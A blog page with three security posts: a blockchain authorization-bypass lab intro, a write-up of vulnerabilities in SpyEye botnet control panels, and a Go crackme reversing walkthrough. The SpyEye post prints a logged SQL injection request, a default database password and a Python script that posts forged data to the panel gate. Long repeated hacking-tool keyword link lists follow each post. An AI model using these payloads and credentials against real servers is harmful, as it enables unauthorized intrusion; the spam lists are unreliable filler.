Tuesday, May 30, 2023

Blockchain Exploitation Labs - Part 2 Hacking Blockchain Authorization


Bypassing Blockchain Authorization via Unsecured Functions


Note: Since the first part of this series I have also uploaded some further videos on remediation of reentrancy and dealing with compiler versions when working with this hacking blockchain series.  Head to the console cowboys YouTube account to check those out.  Haha as mentioned before I always forget to post blogs when I get excited making videos and just move on to my next project… So make sure to subscribe to the YouTube if you are waiting for any continuation of a video series.. It may show up there way before here. 

Note 2:  You WILL run into issues when dealing with Ethereum hacking, and you will have to google them as versions and functionality changes often... Be cognizant of versions used hopefully you will not run into to many hard to fix issues. 

In the second part of this lab series we are going to take a look at privacy issues on the blockchain which can result in a vulnerably a traditional system may  not face. Since typically blockchain projects are open source and also sometimes viewable within blockchain explorers but traditional application business logic is not usually available to us. With traditional applications we might not find these issues due to lack of knowledge of internal functionality or inability to read private values on a remote server side script.  After we review some issues we are going to exploit an authorization issues by writing web3.js code to directly bypass vertical authorization restrictions.

Blockchain projects are usually open source projects which allow you to browse their code and see what's going on under the hood.  This is fantastic for a lot of reasons but a developer can run into trouble with this if bad business logic decisions are deployed to the immutable blockchain.  In the first part of this series I mentioned that all uploaded code on the blockchain is immutable. Meaning that if you find a vulnerability it cannot be patched. So let's think about things that can go wrong..

A few things that can go wrong:
  • Randomization functions that use values we can predict if we know the algorithm
  • Hard-coded values such as passwords and private variables you can't change.
  • Publicly called functions which offer hidden functionality
  • Race conditions based on how requirements are calculated

Since this will be rather technical, require some setup and a lot of moving parts we will follow this blog via the video series below posting videos for relevant sections with a brief description of each.  I posted these a little bit ago but have not gotten a chance to post the blog associated with it.  Also note this series is turning into a full lab based blockchain exploitation course so keep a lookout for that.

In this first video you will see how data about your project is readily available on the blockchain in multiple formats for example:
  • ABI data that allows you to interact with methods.
  • Actual application code.
  • Byte code and assembly code.
  • Contract addresses and other data.

 Lab Video Part 1: Blockchain OSINT: 



Once you have the data you need to interact with a contract on the blockchain via some OSINT how do you actually interface with it? That's the question we are going to answer in this second video. We will take the ABI contract array and use it to interact with methods on the blockchain via Web3.js and then show how this correlates to its usage in an HTML file

Lab Video Part 2: Connecting to a Smart Contract: 




Time to Exploit an Application:

Exploit lab time, I created an vulnerable application you can use to follow along in the next video. Lab files can be downloaded from the same location as the last blog located below. Grab the AuthorizationLab.zip file:

Lab file downloads:



Ok so you can see what's running on the blockchain, you can connect to it, now what?   Now we need to find a vulnerability and show how to exploit it. Since we are talking about privacy in this blog and using it to bypass issues. Lets take a look at a simple authorization bypass we can exploit by viewing an authorization coding error and taking advantage of it to bypass restrictions set in the Smart Contract.  You will also learn how to setup a local blockchain for testing purposes and you can download a hackable application to follow along with the exercises in the video..

Lab Video Part 3:  Finding and hacking a Smart Contract Authorization Issue: 





Summary:

In this part of the series you learned a lot, you learned how to transfer your OSINT skills to the blockchain. Leverage the information found to connect to that Smart Contract. You also learned how to interact with methods and search for issues that you can exploit. Finally you used your browsers developer console as a means to attack the blockchain application for privilege escalation.
More information
  1. Hacker Tools Github
  2. Hacker Tools Free Download
  3. Hacking Tools For Pc
  4. Beginner Hacker Tools
  5. Hack Tools
  6. Hack Tool Apk No Root
  7. Hacking Tools For Kali Linux
  8. Hack Tool Apk No Root
  9. Hack Tools
  10. Hackers Toolbox
  11. How To Hack
  12. Hack Tools 2019
  13. Hacker Tools For Pc
  14. New Hack Tools
  15. Hacker Tools Linux
  16. Pentest Tools Subdomain
  17. Underground Hacker Sites
  18. Best Pentesting Tools 2018
  19. Hacker Tools For Ios
  20. Pentest Reporting Tools
  21. Hack Tools Online
  22. Hacking Tools For Windows Free Download
  23. Github Hacking Tools
  24. What Is Hacking Tools
  25. Pentest Tools Github
  26. Install Pentest Tools Ubuntu
  27. Pentest Tools Port Scanner
  28. Hack App
  29. Hacker
  30. Pentest Automation Tools
  31. Hacker Tools For Pc
  32. Hacker Tools Free Download
  33. Blackhat Hacker Tools
  34. Hackrf Tools
  35. Hack Rom Tools
  36. Hacker Tools For Windows
  37. Pentest Tools Online
  38. How To Make Hacking Tools
  39. Hacking Tools For Windows Free Download
  40. Install Pentest Tools Ubuntu
  41. Tools 4 Hack
  42. Pentest Tools Linux
  43. Hack Tools Download
  44. Hacker Tools Github
  45. Pentest Tools Website
  46. Hackrf Tools
  47. Hacking Tools For Beginners
  48. Physical Pentest Tools
  49. Pentest Tools Review
  50. Pentest Tools Nmap
  51. Hacking Tools Windows
  52. Free Pentest Tools For Windows
  53. Hacker Tools Mac
  54. Wifi Hacker Tools For Windows
  55. Hacking Tools 2019
  56. Ethical Hacker Tools
  57. Bluetooth Hacking Tools Kali
  58. Hack Tools Online
  59. Hacking Tools For Pc
  60. Pentest Tools
  61. Pentest Tools Review
  62. Pentest Reporting Tools
  63. Hacking Tools 2019
  64. Pentest Tools Alternative
  65. Hack Tools For Pc
  66. Hacker Tools Github
  67. Pentest Tools Linux
  68. Github Hacking Tools
  69. Pentest Tools List
  70. Hackrf Tools
  71. Pentest Tools For Mac
  72. What Are Hacking Tools
  73. Hacking Tools Download
  74. Pentest Tools
  75. Hacks And Tools
  76. Free Pentest Tools For Windows
  77. Hacker Hardware Tools
  78. Pentest Tools List
  79. Hacking Tools Github
  80. Hack Tools Download
  81. Pentest Tools Kali Linux
  82. Ethical Hacker Tools
  83. Best Pentesting Tools 2018
  84. Usb Pentest Tools
  85. Hack Tools Download
  86. Hack App
  87. Underground Hacker Sites
  88. Hacking Tools For Kali Linux
  89. Hacking Tools For Pc
  90. Hacking Tools And Software
  91. Hacker Tools Windows
  92. Tools For Hacker
  93. Computer Hacker
  94. Hacker Tools 2019
  95. Pentest Tools Apk
  96. Hack Tools 2019
  97. Pentest Tools
  98. Hacker Tools Mac
  99. Hacker Tools Free
  100. Tools For Hacker
  101. Pentest Tools Bluekeep
  102. Hack Tools Download
  103. How To Install Pentest Tools In Ubuntu
  104. Hacker Tools For Ios
  105. Hacker Tools Online
  106. Physical Pentest Tools
  107. What Are Hacking Tools
  108. Hack Tools
  109. Hacker Tools For Ios
  110. Free Pentest Tools For Windows
  111. Best Hacking Tools 2019
  112. Hacking Apps
  113. Tools Used For Hacking
  114. Hack Tool Apk
  115. Hack Tools For Pc
  116. Hacker Techniques Tools And Incident Handling
  117. Pentest Tools Windows
  118. Hack Tools For Ubuntu
  119. Pentest Tools
  120. Pentest Recon Tools
  121. Pentest Tools Kali Linux
  122. Pentest Tools Kali Linux
  123. Hack Tools For Windows
  124. Termux Hacking Tools 2019
  125. Black Hat Hacker Tools
  126. Hacker Tools Software
  127. Hacking Tools Kit
  128. Hacking Tools Software
  129. Pentest Tools Website Vulnerability
  130. Pentest Tools Apk
  131. Hack Tools For Games
  132. Hacking Tools For Mac
  133. Pentest Tools Alternative
  134. Hacking Tools For Windows Free Download
  135. Hacking Tools
  136. Hack Tools Download
  137. Hack And Tools
  138. Github Hacking Tools
  139. Hacker Tools Software

Attacking Financial Malware Botnet Panels - SpyEye

This is the second blog post in the "Attacking financial malware botnet panels" series. After playing with Zeus, my attention turned to another old (and dead) botnet, SpyEye. From an ITSEC perspective, SpyEye shares a lot of vulnerabilities with Zeus. 

The following report is based on SpyEye 1.3.45, which is old, and if we are lucky, the whole SpyEye branch will be dead soon. 

Google dorks to find SpyEye C&C server panel related stuff:

  • if the img directory gets indexed, it is rather easy, search for e.g. inurl:b-ftpbackconnect.png
  • if the install directory gets indexed, again, easy, search for e.g. inurl:spylogo.png
  • also, if you find a login screen, check the css file (style.css), and you see #frm_viewlogs, #frm_stat, #frm_botsmon_country, #frm_botstat, #frm_gtaskloader and stuff like that, you can be sure you found it
  • otherwise, it is the best not to Google for it, but get a SpyEye sample and analyze it
And this is how the control panel login looks like, nothing sophisticated:


The best part is that you don't have to guess the admin's username ;)

This is how an average control panel looks like:


Hack the Planet! :)

Boring vulns found (warning, an almost exact copy from the Zeus blog post)


  • Clear text HTTP login - you can sniff the login password via MiTM, or steal the session cookies
  • No password policy - admins can set up really weak passwords
  • No anti brute-force - you can try to guess the admin's password. There is no default username, as there is no username handling!
  • Password autocomplete enabled - boring
  • Missing HttpOnly flag on session cookie - interesting when combining with XSS
  • No CSRF protection - e.g. you can upload new exe, bin files, turn plugins on/off :-( boring. Also the file extension check can be bypassed, but the files are stored in the database, so no PHP shell this time. If you check the following code, you can see that even the file extension and type is checked, and an error is shown, but the upload process continues. And even if the error would stop the upload process, the check can be fooled by setting an invalid $uptype. Well done ...
        if ($_FILES['file']['tmp_name'] && ($_FILES['file']['size'] > 0))         {                 $outstr = "<br>";                 set_time_limit(0);                 $filename = str_replace(" ","_",$_FILES['file']['name']);                 $ext = substr($filename, strrpos($filename, '.')+1);                 if( $ext==='bin' && $uptype!=='config' ) $outstr .= "<font class='error'>Bad CONFIG extension!</font><br>";                 if( $ext==='exe' && $uptype!=='body' && $uptype!=='exe' ) $outstr .= "<font class='error'>Bad extension!</font><br>";                  switch( $uptype )                 {                 case 'body': $ext = 'b'; break;                 case 'config': $ext = 'c'; break;                 case 'exe': $ext = 'e'; break;                 default: $ext = 'e';                 }                 $_SESSION['file_ext'] = $ext;                 if( isset($_POST['bots']) && trim($_POST['bots']) !== '')                 {                         $bots = explode(' ', trim($_POST['bots']));                         //writelog("debug.log", trim($_POST['bots']));                         $filename .= "_".(LastFileId()+1);                 }                 if( FileExist($filename) ) $filename .= LastFileId();                 $tmpName  = $_FILES['file']['tmp_name'];                 $fileSize = $_FILES['file']['size'];                 $fileType = $_FILES['file']['type'];                 ## reading all file for calculating hash                 $fp = fopen($tmpName, 'r'); 
  • Clear text password storage - the MySQL passwords are stored in php files, in clear text. Also, the login password to the form panel is stored in clear text.
  • MD5 password - the passwords stored in MySQL are MD5 passwords. No PBKDF2, bcrypt, scrypt, salt, whatever. MD5. Just look at the pure simplicity of the login check, great work!
$query = "SELECT * FROM users_t WHERE uPswd='".md5($pswd)."'";
  • ClickJacking - really boring stuff

SQL injection


SpyEye has a fancy history of SQL injections. See details here, here, here, video here and video here.

It is important to highlight the fact that most of the vulnerable functions are reachable without any authentication, because these PHP files lack user authentication at the beginning of the files.

But if a C&C server owner gets pwned through this vuln, it is not a good idea to complain to the developer, because after careful reading of the install guide, one can see:

"For searching info in the collector database there is a PHP interface as formgrabber admin panel. The admin panel is not intended to be found on the server. This is a client application."

And there are plenty of reasons not to install the formgrabber admin panel on any internet reachable server. But this fact leads to another possible vulnerability. The user for this control panel is allowed to remotely login to the MySQL database, and the install guide has pretty good passwords to be reused. I mean it looks pretty secure, there is no reason not to use that.

CREATE USER 'frmcpviewer' IDENTIFIED BY 'SgFGSADGFJSDGKFy2763272qffffHDSJ'; 

Next time you find a SpyEye panel, and you can connect to the MySQL database, it is worth a shot to try this password.

Unfortunately the default permissions for this user is not enough to write files (select into outfile):

Access denied for user 'frmcpviewer' (using password: YES)

I also made a little experiment with this SQL injection vulnerability. I did set up a live SpyEye botnet panel, created the malware install binaries (droppers), and sent the droppers to the AV companies. And after more and more sandboxes connected to my box, someone started to exploit the SQL injection vulnerability on my server!

63.217.168.90 - - [16/Jun/2014:04:43:00 -0500] "GET /form/frm_boa-grabber_sub.php?bot_guid=&lm=3&dt=%20where%201=2%20union%20select%20@a:=1%20from%20rep1%20where%20@a%20is%20null%20union%20select%20@a:=%20@a%20%2b1%20union%20select%20concat(id,char(1,3,3,7),bot_guid,char(1,3,3,7),process_name,char(1,3,3,7),hooked_func,char(1,3,3,7),url,char(1,3,3,7),func_data)%20from%20rep2_20140610%20where%20@a=3%23 HTTP/1.1" 200 508 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)"

Although the query did not return any meaningful data to the attacker (only data collected from sandboxes), it raises some legal questions.

Which company/organization has the right to attack my server? 
  • police (having a warrant)
  • military (if we are at war)
  • spy agencies (always/never, choose your favorite answer)
  • CERT organisations?

But, does an AV company or security research company has the legal right to attack my server? I don't think so... The most problematic part is when they hack a server (without authorization), and sell the stolen information in the name of "intelligence service". What is it, the wild wild west?

The SQLi clearly targets the content of the stolen login credentials. If this is not an AV company, but an attacker, how did they got the SpyEye dropper? If this is an AV company, why are they stealing the stolen credentials? Will they notify the internet banking owners about the stolen credentials for free? Or will they do this for money?

And don't get me wrong, I don't want to protect the criminals, but this is clearly a grey area in the law. From an ethical point of view, I agree with hacking the criminal's servers. As you can see, the whole post is about disclosing vulns in these botnet panels. But from a legal point of view, this is something tricky ... I'm really interested in the opinion of others, so comments are warmly welcome.

On a side note, I was interested how did the "attackers" found the SpyEye form directory? Easy, they brute-forced it, with a wordlist having ~43.000 entries.

(Useless) Cross site scripting


Although parts of the SpyEye panel are vulnerable to XSS, it is unlikely that you will to find these components on the server, as these codes are part of the install process, and the installer fails to run if a valid install is found. And in this case, you also need the DB password to trigger the vuln...



Session handling


This is a fun part. The logout button invalidates the session only on the server side, but not on the client side. But if you take into consideration that the login process never regenerates the session cookies (a.k.a session fixation), you can see that no matter how many times the admin logs into the application, the session cookie remains the same (until the admin does not close the browser). So if you find a session cookie which was valid in the past, but is not working at the moment, it is possible that this cookie will be valid in the future ...

Binary server


Some parts of the SpyEye server involve running a binary server component on the server, to collect the form data. It would be interesting to fuzz this component (called sec) for vulns.

Log files revealed


If the form panel mentioned in the SQLi part is installed on the server, it is worth visiting the <form_dir>/logs/error.log file, you might see the path of the webroot folder, IP addresses of the admins, etc.

Reading the code


Sometimes reading the code you can find code snippets, which is hard to understand with a clear mind:

$content = fread($fp, filesize($tmpName)); if ( $uptype === 'config' )     $md5 = GetCRC32($content); else $md5 = md5($content); .... <script> if (navigator.userAgent.indexOf("Mozilla/4.0") != -1) {         alert("Your browser is not support yet. Please, use another (FireFox, Opera, Safari)");         document.getElementById("div_main").innerHTML = "<font class=\'error\'>ChAnGE YOuR BRoWsEr! Dont use BUGGED Microsoft products!</font>"; } </script> 

Decrypting SpyEye communication

It turned out that the communication between the malware and C&C server is not very sophisticated (Zeus does a better job at it, because the RC4 key stream is generated from the botnet password).

function DeCode($content) {         $res = '';         for($i = 0; $i < strlen($content); $i++)         {                 $num = ord($content[$i]);                 if( $num != 219) $res .= chr($num^219);         }         return $res; } 
Fixed XOR key, again, well done ...
This means that it is easy to create a script, which can communicate with the SpyEye server. For example this can be used to fill in the SpyEye database with crap data.


import binascii import requests import httplib, urllib  def xor_str(a, b):     i = 0     xorred = ''     for i in range(len(a)):         xorred += chr(ord(a[i])^b)     return xorred              b64_data= "vK6yv+bt9er17O3r6vqPnoiPjZb2i5j6muvo6+rjmJ/9rb6p5urr6O/j/bK+5uP16/Xs7evq9ers7urv/bSo5u316vXs7evq/a6v5pq/trK1/bi4qbjm453j6uPv7Or9tr/u5um+uuvpve3p7eq/4+vsveLi7Lnqvrjr6ujs7rjt7rns/au3vOa5sre3srW8s7q2tr6p4Lm3tLiw4LmuvKm+q7Spr+C4uPu8qbq5ub6p4Li4vKm6ubm+qeC4qb6/sq+8qbq54LiuqK+0tri0tbW+uK+0qeC/v7So4L+1qLqrsuC+trqyt7ypurm5vqngvb24vqmvvKm6ubm+qeC9/aivuq/mtLW3srW+" payload =xor_str (binascii.a2b_base64(b64_data), 219)  print ("the decrypted payload is: " + payload) params = (binascii.b2a_base64(xor_str(payload,219))) payload = {'data': params} r = requests.post("http://spyeye.localhost/spyeye/_cg/gate.php", data=payload) 

Morale of the story?


Criminals produce the same shitty code as the rest of the world, and thanks to this, some of the malware operators get caught and are behind bars now. And the law is behind the reality, as always.

Read more
  1. Hack Tools Mac
  2. How To Hack
  3. Hacker Tools Windows
  4. Hacking Tools Usb
  5. Pentest Tools Website Vulnerability
  6. Pentest Tools Nmap
  7. Pentest Tools Download
  8. Ethical Hacker Tools
  9. Hacking Tools For Games
  10. Hacker Tools Hardware
  11. Hacking Tools Usb
  12. Usb Pentest Tools
  13. Pentest Tools Framework
  14. Hacking Tools 2020
  15. How To Hack
  16. Hacker Tools Windows
  17. Hacker
  18. Pentest Tools Port Scanner
  19. Hacking Tools Download
  20. Hacker Search Tools
  21. Hack Tools For Windows
  22. Pentest Tools For Android
  23. Tools For Hacker
  24. World No 1 Hacker Software
  25. Hak5 Tools
  26. Pentest Tools Linux
  27. Beginner Hacker Tools
  28. Hacker Tools Hardware
  29. Kik Hack Tools
  30. Hacking Tools Hardware
  31. Hacker Tools 2019
  32. Hack Tools Github
  33. Hacking Tools Pc
  34. Hack And Tools
  35. Best Pentesting Tools 2018
  36. Hack Tools Mac
  37. Free Pentest Tools For Windows
  38. Hack Tools For Mac
  39. Hack Tools Github
  40. Top Pentest Tools
  41. Hacker Tools Mac
  42. Hacker
  43. Hacking Tools Hardware
  44. Pentest Tools Download
  45. Hacking Tools Free Download
  46. Hacking Tools For Windows
  47. Hacker Tools For Windows
  48. Pentest Tools Url Fuzzer
  49. Hack Tools
  50. Growth Hacker Tools
  51. Tools For Hacker
  52. Tools For Hacker
  53. Pentest Tools Framework
  54. Pentest Tools Open Source
  55. Pentest Tools Tcp Port Scanner
  56. Hacker Tools Apk
  57. Pentest Tools Subdomain
  58. Github Hacking Tools
  59. Bluetooth Hacking Tools Kali
  60. Hack App
  61. How To Make Hacking Tools
  62. Hack Tools For Ubuntu
  63. What Is Hacking Tools
  64. Pentest Tools Website Vulnerability
  65. Underground Hacker Sites
  66. Hack Tools Online
  67. Game Hacking
  68. Hacker Tools Software
  69. Pentest Tools For Mac
  70. Hack Tools 2019
  71. Pentest Tools For Android
  72. Pentest Tools Windows
  73. What Is Hacking Tools
  74. Hacking Tools For Mac
  75. Pentest Tools For Windows
  76. Hacker Tool Kit
  77. Pentest Tools For Ubuntu
  78. Hacking App
  79. Computer Hacker
  80. Pentest Tools For Ubuntu
  81. Pentest Tools Framework
  82. Pentest Box Tools Download
  83. Github Hacking Tools
  84. Pentest Tools Review
  85. Growth Hacker Tools
  86. Pentest Automation Tools
  87. What Is Hacking Tools
  88. Pentest Tools Free
  89. Free Pentest Tools For Windows
  90. Wifi Hacker Tools For Windows
  91. Hacker Tool Kit
  92. Pentest Tools For Ubuntu
  93. New Hack Tools
  94. Hacking Tools Free Download
  95. Hack Tools Download
  96. Pentest Tools Website Vulnerability
  97. Pentest Tools Nmap
  98. Hacking Tools For Games
  99. Pentest Tools For Ubuntu
  100. Hacking Apps
  101. Hack Tools Github
  102. Github Hacking Tools
  103. Hack Tools Github
  104. How To Hack
  105. Hacking Tools For Kali Linux
  106. Hacking Tools Windows
  107. Blackhat Hacker Tools
  108. Pentest Tools Website
  109. Kik Hack Tools
  110. Pentest Tools Tcp Port Scanner
  111. Hack Tools Github
  112. New Hack Tools
  113. Hack Tools 2019
  114. Hacking Tools For Beginners
  115. Hacking Tools Software
  116. Hacker Tools Linux
  117. Pentest Tools Website
  118. Pentest Tools Framework
  119. Pentest Tools List
  120. Tools Used For Hacking
  121. Pentest Tools Github
  122. Pentest Tools Download
  123. Pentest Box Tools Download
  124. Hack Tools
  125. Blackhat Hacker Tools
  126. Hacking Apps
  127. Hacker Tools Online
  128. Hacking Tools For Windows Free Download
  129. Pentest Tools List
  130. Github Hacking Tools
  131. Github Hacking Tools
  132. Install Pentest Tools Ubuntu

Monday, May 29, 2023

inBINcible Writeup - Golang Binary Reversing

This file is an 32bits elf binary, compiled from go language (i guess ... coded by @nibble_ds ;)
The binary has some debugging symbols, which is very helpful to locate the functions and api calls.

GO source functions:
-  main.main
-  main.function.001

If the binary is executed with no params, it prints "Nope!", the bad guy message.

~/ncn$ ./inbincible 
Nope!

Decompiling the main.main function I saw two things:

1. The Argument validation: Only one 16 bytes long argument is needed, otherwise the execution is finished.

2. The key IF, the decision to dexor and print byte by byte the "Nope!" string OR dexor and print "Yeah!"


The incoming channel will determine the final message.


Dexor and print each byte of the "Nope!" message.


This IF, checks 16 times if the go channel reception value is 0x01, in this case the app show the "Yeah!" message.

Go channels are a kind of thread-safe queue, a channel_send is like a push, and channel_receive is like a pop.

If we fake this IF the 16 times, we got the "Yeah!" message:

(gdb) b *0x8049118
(gdb) commands
>set {char *}0xf7edeef3 = 0x01
>c
>end

(gdb) r 1234567890123456
tarting program: /home/sha0/ncn/inbincible 1234567890123456
...
Yeah!


Ok, but the problem is not in main.main, is main.function.001 who must sent the 0x01 via channel.
This function xors byte by byte the input "1234567890123456" with a byte array xor key, and is compared with another byte array.

=> 0x8049456:       xor    %ebp,%ecx
This xor,  encode the argument with a key byte by byte

The xor key can be dumped from memory but I prefer to use this macro:

(gdb) b *0x8049456
(gdb) commands
>i r  ecx
>c
>end
(gdb) c

Breakpoint 2, 0x08049456 in main.func ()
ecx            0x12 18

Breakpoint 2, 0x08049456 in main.func ()
ecx            0x45 69

Breakpoint 2, 0x08049456 in main.func ()
ecx            0x33 51

Breakpoint 2, 0x08049456 in main.func ()
ecx            0x87 135

Breakpoint 2, 0x08049456 in main.func ()
ecx            0x65 101

Breakpoint 2, 0x08049456 in main.func ()
ecx            0x12 18

Breakpoint 2, 0x08049456 in main.func ()
ecx            0x45 69

Breakpoint 2, 0x08049456 in main.func ()
ecx            0x33 51

Breakpoint 2, 0x08049456 in main.func ()
ecx            0x87 135

Breakpoint 2, 0x08049456 in main.func ()
ecx            0x65 101

Breakpoint 2, 0x08049456 in main.func ()
ecx            0x12 18

Breakpoint 2, 0x08049456 in main.func ()
ecx            0x45 69

Breakpoint 2, 0x08049456 in main.func ()
ecx            0x33 51

Breakpoint 2, 0x08049456 in main.func ()
ecx            0x87 135

Breakpoint 2, 0x08049456 in main.func ()
ecx            0x65 101

Breakpoint 2, 0x08049456 in main.func ()
ecx            0x12 18

The result of the xor will compared with another array byte,  each byte matched, a 0x01 will be sent.

The cmp of the xored argument byte,
will determine if the channel send 0 or 1


(gdb) b *0x0804946a
(gdb) commands
>i r al
>c
>end

At this point we have the byte array used to xor the argument, and the byte array to be compared with, if we provide an input that xored with the first byte array gets the second byte array, the code will send 0x01 by the channel the 16 times.


Now web have:

xorKey=[0x12,0x45,0x33,0x87,0x65,0x12,0x45,0x33,0x87,0x65,0x12,0x45,0x33,0x87,0x65,0x12]

mustGive=[0x55,0x75,0x44,0xb6,0x0b,0x33,0x06,0x03,0xe9,0x02,0x60,0x71,0x47,0xb2,0x44,0x33]


Xor is reversible, then we can get the input needed to dexor to the expected values in order to send 0x1 bytes through the go channel.

>>> x=''
>>> for i in range(len(xorKey)):
...     x+= chr(xorKey[i] ^ mustGive[i])
... 
>>> print x

G0w1n!C0ngr4t5!!


And that's the key :) let's try it:

~/ncn$ ./inbincible 'G0w1n!C0ngr4t5!!'
Yeah!

Got it!! thanx @nibble_ds for this funny crackme, programmed in the great go language. I'm also a golang lover.


More articles


  1. Hacking Tools Windows
  2. Hacker Security Tools
  3. Pentest Tools Review
  4. Tools 4 Hack
  5. Pentest Tools For Windows
  6. Pentest Tools Port Scanner
  7. Pentest Tools Alternative
  8. Hack Tools Download
  9. Hacking Tools For Windows Free Download
  10. How To Make Hacking Tools
  11. Hacking Tools Usb
  12. Hackrf Tools
  13. Pentest Tools List
  14. Hacker Tools 2020
  15. Hack And Tools
  16. Underground Hacker Sites
  17. Best Hacking Tools 2020
  18. Ethical Hacker Tools
  19. Nsa Hacker Tools
  20. Android Hack Tools Github
  21. Pentest Tools Review
  22. Hackrf Tools
  23. Pentest Automation Tools
  24. Hack Tools Online
  25. Hack And Tools
  26. Computer Hacker
  27. Hacking Tools 2019
  28. Hacking Tools Download
  29. Hacker Tools Hardware
  30. Hack Tool Apk No Root
  31. Hacking Tools For Mac
  32. Kik Hack Tools
  33. Nsa Hack Tools
  34. Pentest Tools Open Source
  35. Game Hacking
  36. Hacker Tools Apk
  37. Hack Tools Mac
  38. Pentest Tools Website Vulnerability
  39. Tools Used For Hacking
  40. Hacking Tools And Software
  41. Hacker Tools For Windows
  42. Pentest Tools Github
  43. Kik Hack Tools
  44. Hacking Tools
  45. Hack Tool Apk No Root
  46. Hack Tool Apk
  47. Hacker Tools Free Download
  48. Hacker
  49. Hacks And Tools
  50. Hacking Tools Hardware
  51. Hacker Tools List
  52. Hacker Hardware Tools
  53. Hack Tools For Pc
  54. Tools For Hacker
  55. Hacker Tools Hardware
  56. Hackrf Tools
  57. Hacker Tools For Mac
  58. Hacking Tools For Windows
  59. Pentest Tools Apk
  60. Hacking Tools Software
  61. Best Hacking Tools 2020
  62. New Hacker Tools
  63. Easy Hack Tools
  64. Hack Rom Tools
  65. Hacks And Tools
  66. Hacker Tools Windows
  67. Hack Tools Pc
  68. Hacking Tools Usb
  69. Hacking Tools For Beginners
  70. Hacking Tools 2020
  71. World No 1 Hacker Software
  72. Pentest Box Tools Download
  73. Physical Pentest Tools
  74. Pentest Tools Kali Linux
  75. Wifi Hacker Tools For Windows
  76. New Hack Tools
  77. Github Hacking Tools
  78. Hack Tools For Games
  79. Tools Used For Hacking
  80. Hacking Tools For Windows 7
  81. Hacking Tools Windows
  82. Tools Used For Hacking
  83. Free Pentest Tools For Windows
  84. Hacker
  85. Hacking Tools Hardware
  86. Pentest Tools Free
  87. Pentest Reporting Tools
  88. Tools For Hacker
  89. Pentest Automation Tools
  90. Hackers Toolbox
  91. Hack Tool Apk
  92. Pentest Tools List
  93. Hacker Search Tools
  94. Hacking Tools For Windows
  95. Pentest Tools Windows
  96. Game Hacking
  97. Hack App
  98. Hack Tools 2019
  99. Pentest Tools Nmap
  100. Pentest Tools Download
  101. Hacker Tools Windows
  102. Hacking Tools Hardware
  103. Hack Tools Download
  104. New Hacker Tools
  105. Hacking Tools For Windows
  106. Hacking Apps
  107. Hacker Tool Kit
  108. Best Hacking Tools 2020
  109. Hacker Tools Mac
  110. Pentest Tools Kali Linux
  111. New Hacker Tools
  112. Hacker Tools Free Download
  113. Hacker Tools Free Download
  114. Pentest Tools Tcp Port Scanner
  115. Pentest Tools
  116. Pentest Tools Apk
  117. Pentest Tools Android